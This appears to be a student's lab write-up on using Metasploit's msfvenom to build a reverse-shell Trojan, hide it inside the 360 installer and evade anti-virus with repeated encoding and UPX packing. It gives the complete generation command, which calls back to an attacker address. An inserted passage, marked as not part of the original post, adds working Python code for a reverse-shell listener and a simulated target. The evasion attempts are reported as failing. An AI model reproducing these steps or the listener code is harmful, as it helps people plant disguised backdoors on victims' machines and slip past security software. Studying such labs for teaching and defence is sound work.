2017-2018-1 20179202 "Linux kernel Fundamentals and Analysis" 11th week assignment

Source: Internet
Author: User
Tags: kali linux

Metasploit: generating a Trojan, bundling it into another program, and anti-virus evasion

1. Preliminary knowledge

(1) Metasploit

Metasploit is an open-source vulnerability exploitation and penetration-testing tool, formally the Metasploit Framework (MSF). MSF is an exploit framework: users can write their own exploit modules and test them inside it. The Metasploit architecture:

[Figure: Metasploit architecture. Image source: the "Play Metasploit" series, first episode]

Base libraries:

    • Rex: the basic library of Metasploit; it supports the different protocols, transformations and socket handling the framework needs
    • MSF Core: defines the framework and provides the basic application interface (API) of Metasploit
    • MSF Base: provides a simplified, user-friendly application interface on top of the core

Modules (the core penetration-testing capabilities, implemented as code that the Metasploit framework loads, integrates and exposes to the user):

    • Exploit modules (exploits): code that exploits a discovered security vulnerability or configuration weakness on a remote target system in order to implant and run a payload, and so gain control of the target
    • Payload modules (payloads): the implanted code that runs on the target after a successful exploit; it usually opens a control session from the target back to the attacker
    • Encoder modules (encoders): re-encode the payload so that it contains no "bad characters" (bytes such as NUL that would break the exploit) and, as a side effect, change its byte pattern so that signature-based anti-virus is less likely to match it
    • Post-exploitation modules (post): support the work done after remote control of the target has been obtained, such as collecting sensitive information, extending access further, and pivoting through the compromised host to attack other systems
    • Auxiliary modules (auxiliary): modules without a payload, used for tasks such as port scanning, fingerprinting and service scanning

(2) Payload tools

    • msfpayload: generates and outputs shellcode for all of Metasploit's payload types
    • msfencode: encodes the shellcode produced by msfpayload so that it fits the target environment and runs reliably there
    • msfvenom: combines msfpayload and msfencode in one tool (msfpayload and msfencode were removed from Metasploit in 2015; current versions ship only msfvenom)

2. Experiments

(1) Select a payload

Type msfconsole to enter the Metasploit console:

Type show payloads to list all available payloads:

In this experiment we use windows/shell_reverse_tcp (a simple reverse shell: once it runs on the target it connects back to the attacker and hands over a command prompt).

(2) Select a file to bundle with

You can generate a stand-alone EXE, or bundle the payload into another EXE. This experiment uses bundling; the 360 installer (360.exe) was chosen as the carrier program.

(3) Anti-virus evasion

The aim is to make the Trojan bypass anti-virus detection. One option inside the Metasploit framework is the MSF encoders. msfvenom -l encoders lists the available encoders (not all of them can be used against Windows targets):

The experiment uses x86/shikata_ga_nai:

(4) Generation, bundling and the evasion attempt

Lab environment:

Attacker: Kali Linux, IP 192.168.177.133

Target: Windows 7, IP 192.168.177.1

Command and explanation:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.177.133 LPORT=8080 -e x86/shikata_ga_nai -x 360.exe -i 5 -f exe -o /root/backdoor.exe

    • -p windows/shell_reverse_tcp: use the shell_reverse_tcp payload
    • LHOST=192.168.177.133: the attacker's IP address
    • LPORT=8080: the attacker's listening port, which receives the Trojan's connection
    • -e x86/shikata_ga_nai: encode with shikata_ga_nai
    • -x 360.exe: bundle the Trojan into 360.exe, using it as the template executable (without msfvenom's -k option the result only runs the payload; the installer's own behaviour is not preserved)
    • -i 5: run the encoder 5 times over the payload
    • -f exe: output format exe
    • -o /root/backdoor.exe: output path of the finished file

Next, start a listener on Kali that waits for the Trojan's connection (the reverse shell connects to LHOST:LPORT, so a listener, for example netcat or Metasploit's exploit/multi/handler with the same payload, LHOST and LPORT, must be bound to port 8080 before backdoor.exe runs on the target):
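The listener step above, as an added example that is not part of the original post: a minimal Python stand-in for the netcat or multi/handler listener, plus a constructed stand-in for backdoor.exe, exchanging messages over the loopback interface. The banner, prompt, command replies, addresses and port in demo() are all made up for the example; the real payload simply spawns cmd.exe with its standard input and output attached to the socket. The example shows the two points that matter in practice: the target initiates the TCP connection to LHOST:LPORT (so the listener must already be bound, and only inbound traffic towards the attacker needs to be permitted), and the whole session is cleartext, so every command and its output is visible to anyone watching the network path.

```python
import socket
import threading

PROMPT = b"C:\\Users\\victim>"  # constructed cmd.exe prompt; cmd.exe sends it with no trailing newline


def _read_to_prompt(conn: socket.socket) -> bytes:
    """Read until the next cmd.exe prompt arrives (or the peer closes the connection)."""
    buf = b""
    while not buf.endswith(b">"):
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def start_listener(lhost: str = "0.0.0.0", lport: int = 8080) -> socket.socket:
    """LHOST/LPORT side: bind and listen *before* backdoor.exe runs, because the Trojan
    connects to us, not the other way round (stand-in for `nc -lvp 8080` or multi/handler)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))
    srv.listen(1)
    return srv


def drive_shell(srv: socket.socket, commands, timeout: float = 5.0):
    """Accept the reverse connection, then send each command (CRLF-terminated, as cmd.exe
    expects) and collect the cleartext output up to the next prompt.
    Returns (peer_address, banner, list_of_outputs)."""
    srv.settimeout(timeout)
    conn, peer = srv.accept()
    srv.close()
    conn.settimeout(timeout)
    outputs = []
    with conn:
        banner = _read_to_prompt(conn)
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\r\n")
            outputs.append(_read_to_prompt(conn))
    return peer, banner, outputs


def fake_target(lhost: str, lport: int, replies: dict) -> None:
    """Constructed stand-in for backdoor.exe on the Win7 box: connect OUT to LHOST:LPORT and
    answer like cmd.exe whose stdin/stdout are attached to the socket. Simulation only."""
    with socket.create_connection((lhost, lport)) as s:
        s.sendall(b"Microsoft Windows [Version 6.1.7601]\r\n\r\n" + PROMPT)
        reader = s.makefile("rb")
        for line in reader:
            cmd = line.rstrip(b"\r\n").decode()
            reply = replies.get(cmd, f"'{cmd}' is not recognized as an internal or external command.\r\n")
            s.sendall(reply.encode() + PROMPT)


def demo(commands=("whoami", "ipconfig")):
    """Run both sides in-process on loopback with a random free port; returns (banner, outputs)."""
    srv = start_listener("127.0.0.1", 0)
    lport = srv.getsockname()[1]
    # Constructed replies standing in for real cmd.exe output.
    replies = {"whoami": "win7\\victim\r\n", "ipconfig": "IPv4 Address. . . : 192.168.177.1\r\n"}
    t = threading.Thread(target=fake_target, args=("127.0.0.1", lport, replies), daemon=True)
    t.start()
    _peer, banner, outputs = drive_shell(srv, commands)
    t.join(5)
    return banner, [o.decode() for o in outputs]


if __name__ == "__main__":
    banner, outputs = demo()
    print(banner.decode(), *outputs, sep="")
```

Because the connection direction is target to attacker, a failure to receive the shell from another machine on the LAN is a problem on the attacker's inbound path (host firewall, router or client isolation), not on the target's.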

Running the generated backdoor.exe on Win7: unfortunately, it was detected and removed by 360:

Encode several times with different encoders:

After running it, 360 still detects it:

Next try packing. Type upx to see the UPX packer's parameters; upx -5 backdoor.exe packs backdoor.exe (this is compression; one drawback of packing is that it changes the file size, and experienced security staff easily notice that difference; UPX is also a well-known packer that anti-virus engines unpack statically, so it rarely helps evasion):

Embarrassing... still detected, and you can see that the detection name of the Trojan has changed:

Another problem encountered in the experiment: the Kali attack host could receive the Trojan's connection from the Win7 VM on my own machine, but when Kali attacked Wang's Win7 (on the same LAN) nothing was received. His computer could ping my computer, but my pings to his did not get through. We checked that the firewalls were turned off, so we suspect the lab router has some security configuration.

Because this was my first contact with security systems and software, thanks go to classmate Wang for his guidance in this experiment; the problems encountered were solved after careful thought.

